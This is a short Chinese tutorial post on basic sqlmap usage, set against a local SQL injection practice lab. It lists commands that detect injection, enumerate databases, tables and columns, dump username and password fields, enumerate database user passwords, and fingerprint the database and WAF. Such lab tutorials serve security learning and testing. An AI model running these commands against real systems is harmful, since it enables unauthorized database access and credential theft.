2021Kali系列 -- Sqlmap基础操作

gclome

原文链接：2021Kali系列 -- Sqlmap基础操作

踏实的感觉大概就是，因为你在，我不再招摇，因为我在，你不再动摇。。。

----  网易云热评


一、判断是否存在注入

1、sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1'   
​
2、有下面信息说明存在注入
​

二、获取数据库信息

sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1'   --dbs
​
三、获取数据库security里面的表信息

sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' -D security --tables
​
四、获取数据库security中users表的字段信息

sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' -D security -T users --columns
​
五、获取数据库security中users表中的字段内容

sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' -D security -T users -C "password,username" --dump
​
六、查看数据库相关信息
1、获取数据库当前用户

sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' --current-user
​
2、查看是否是dba权限

sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' --is-dba
​
3、查看当前数据库名称

sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' --current-db
​
4、枚举数据库用户密码

sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' --passwords
​
5、枚举数据库用户名称

sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' --users
​
七、指纹识别
1、获取更广泛的数据库管理系统指纹识别结果

sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' -f

2、获取更精确的指纹识别结果

sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' -b

八、WAF识别

sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' --identify-waf

禁止非法，后果自负
欢迎关注公众号：web安全工具库
欢迎关注视频号：之乎者也吧